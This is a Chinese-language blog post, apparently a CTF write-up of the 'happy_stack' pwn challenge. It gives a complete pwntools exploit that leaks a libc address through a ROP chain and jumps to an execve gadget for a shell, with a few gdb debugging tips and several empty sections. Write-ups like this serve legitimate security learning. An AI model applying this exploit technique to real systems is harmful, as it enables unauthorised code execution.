<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.2.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.2.0" type="image/png" sizes="32x32"><meta name="description" content="happy_stack 本地可打通，远程打不通 莫名其妙 这种栈的基础rop最近做了level3happy_stack                     happy_stack       首先checksec 64位再在ida中查看发现是一个绕过和栈基础rop 绕过没搞懂，主要看下rop                     exp       123456789101112131415">
<meta property="og:type" content="article">
<meta property="og:title" content="happy_stack">
<meta property="og:url" content="http://example.com/2020/11/02/happy_stack/index.html">
<meta property="og:site_name" content="Huken">
<meta property="og:description" content="happy_stack 本地可打通，远程打不通 莫名其妙 这种栈的基础rop最近做了level3happy_stack                     happy_stack       首先checksec 64位再在ida中查看发现是一个绕过和栈基础rop 绕过没搞懂，主要看下rop                     exp       123456789101112131415">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2020/11/02/images/happy_stack_1.PNG">
<meta property="article:published_time" content="2020-11-02T01:06:45.000Z">
<meta property="article:modified_time" content="2020-11-02T12:44:06.323Z">
<meta property="article:author" content="huken">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2020/11/02/images/happy_stack_1.PNG"><title>happy_stack | Huken</title><link ref="canonical" href="http://example.com/2020/11/02/happy_stack/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.2.0"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.2.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Huken</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">happy_stack</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2020-11-02</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2020-11-02</span></span></div></header><div class="post-body"><p><em>happy_stack 本地可打通，远程打不通 莫名其妙</em></p>
<p>这种栈的基础rop最近做了<br>level3<br>happy_stack</p>

        <h1 id="happy-stack"   >
          <a href="#happy-stack" class="heading-link"><i class="fas fa-link"></i></a>happy_stack</h1>
      <p>首先checksec 64位<br>再在ida中查看<br>发现是一个绕过和栈基础rop</p>
<p>绕过没搞懂，主要看下rop</p>

        <h2 id="exp"   >
          <a href="#exp" class="heading-link"><i class="fas fa-link"></i></a>exp</h2>
      <figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;111.231.70.44&quot;</span>,<span class="number">28009</span>)</span><br><span class="line">p = process(<span class="string">&#x27;./happy_stack&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./happy_stack&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc-2.27.so&#x27;</span>)</span><br><span class="line">adr_bin = io.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line">libc_sys =io.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libc_write =elf.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">main_addr = elf.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">poprdi_addr=<span class="number">0x400803</span></span><br><span class="line">ret = <span class="number">0x4006b9</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;36D&#x27;</span>.ljust(<span class="number">0x380</span>,<span class="string">&#x27;\x00&#x27;</span>)+<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p64(poprdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">print(p.recvline())</span><br><span class="line">p.recvline()</span><br><span class="line">puts_addr=u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line">libc_execve=io.symbols[<span class="string">&#x27;execve&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc_execve)</span><br><span class="line"></span><br><span class="line">print(<span class="built_in">hex</span>(puts_addr))</span><br><span class="line">base = puts_addr-(<span class="number">0x80AA0</span>)</span><br><span class="line"><span class="comment">#confirm the right of 0x80AA0</span></span><br><span class="line"><span class="comment"># libc_puts=io.symbols[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="comment"># # print hex(libc_puts) = 0x80aa0</span></span><br><span class="line"></span><br><span class="line">execve_addr=base+<span class="number">0x10a41c</span> <span class="comment">#0x10a41c ;re 0x10a38c</span></span><br><span class="line">payload=<span class="string">&#x27;36D&#x27;</span>.ljust(<span class="number">0x380</span>,<span class="string">&#x27;\x00&#x27;</span>)+<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p64(execve_addr)</span><br><span class="line"><span class="comment">#payload=&#x27;a&#x27;*(0x370+8)+p64(execve_addr)</span></span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></div></figure>
<p>这个知识点网上教程挺多的，就不多赘述，主要说一下</p>

        <h2 id="1-gdb调试-调试时的一些小技巧，查看参数入栈，poprdi小工具的用处"   >
          <a href="#1-gdb调试-调试时的一些小技巧，查看参数入栈，poprdi小工具的用处" class="heading-link"><i class="fas fa-link"></i></a>1. gdb调试 调试时的一些小技巧，查看参数入栈，poprdi小工具的用处</h2>
      <p><em>程序出现想不明白的问题时，通过更具体一层的调试就能找出问题</em></p>

        <h3 id="调试时的一些小技巧"   >
          <a href="#调试时的一些小技巧" class="heading-link"><i class="fas fa-link"></i></a>调试时的一些小技巧</h3>
      <ul>
<li>gdb.attach()进入调试之后的位置就是其所在的位置，所以把它放到合适的位置就能在调试时省去一些麻烦</li>
<li>设置断点可以是以函数为断点，也可以是exp的具体行数<br><img src="./../images/happy_stack_1.PNG" alt="设置断点"></li>
</ul>

        <h2 id="2-对此知识点的一些理解"   >
          <a href="#2-对此知识点的一些理解" class="heading-link"><i class="fas fa-link"></i></a>2. 对此知识点的一些理解</h2>
      
        <h2 id="3-为何不用-system-“-bin-sh”"   >
          <a href="#3-为何不用-system-“-bin-sh”" class="heading-link"><i class="fas fa-link"></i></a>3. 为何不用 system(“/bin/sh”)</h2>
      
        <h2 id="4-其他"   >
          <a href="#4-其他" class="heading-link"><i class="fas fa-link"></i></a>4. 其他</h2>
      <p>在调level3时，泄露出来的write地址不变化，后来加上了sendlineafter() 结果write地址就正确的发生变化了。<br>这里有两个疑点：<br>（1） sendlineafter()比sendline()多了个接收为什么会造成这样的影响<br>（2） 一开始用sendline()后收到的地址到底是什么呢</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://example.com">huken</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://example.com/2020/11/02/happy_stack/">http://example.com/2020/11/02/happy_stack/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2020/11/02/2020_11_2/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">2020112</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2020/10/30/hello-world%20-%20%E5%89%AF%E6%9C%AC/"><span class="paginator-prev__text">Hello World</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#happy-stack"><span class="toc-number">1.</span> <span class="toc-text">
          happy_stack</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">1.1.</span> <span class="toc-text">
          exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-gdb%E8%B0%83%E8%AF%95-%E8%B0%83%E8%AF%95%E6%97%B6%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7%EF%BC%8C%E6%9F%A5%E7%9C%8B%E5%8F%82%E6%95%B0%E5%85%A5%E6%A0%88%EF%BC%8Cpoprdi%E5%B0%8F%E5%B7%A5%E5%85%B7%E7%9A%84%E7%94%A8%E5%A4%84"><span class="toc-number">1.2.</span> <span class="toc-text">
          1. gdb调试 调试时的一些小技巧，查看参数入栈，poprdi小工具的用处</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E8%AF%95%E6%97%B6%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%8A%80%E5%B7%A7"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          调试时的一些小技巧</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%AF%B9%E6%AD%A4%E7%9F%A5%E8%AF%86%E7%82%B9%E7%9A%84%E4%B8%80%E4%BA%9B%E7%90%86%E8%A7%A3"><span class="toc-number">1.3.</span> <span class="toc-text">
          2. 对此知识点的一些理解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E4%B8%BA%E4%BD%95%E4%B8%8D%E7%94%A8-system-%E2%80%9C-bin-sh%E2%80%9D"><span class="toc-number">1.4.</span> <span class="toc-text">
          3. 为何不用 system(“&#x2F;bin&#x2F;sh”)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%85%B6%E4%BB%96"><span class="toc-number">1.5.</span> <span class="toc-text">
          4. 其他</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">7</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">Categories</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2020</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>huken</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.2.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.2.0</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.2.0"></script><script src="/js/stun-boot.js?v=2.2.0"></script><script src="/js/scroll.js?v=2.2.0"></script><script src="/js/header.js?v=2.2.0"></script><script src="/js/sidebar.js?v=2.2.0"></script></body></html>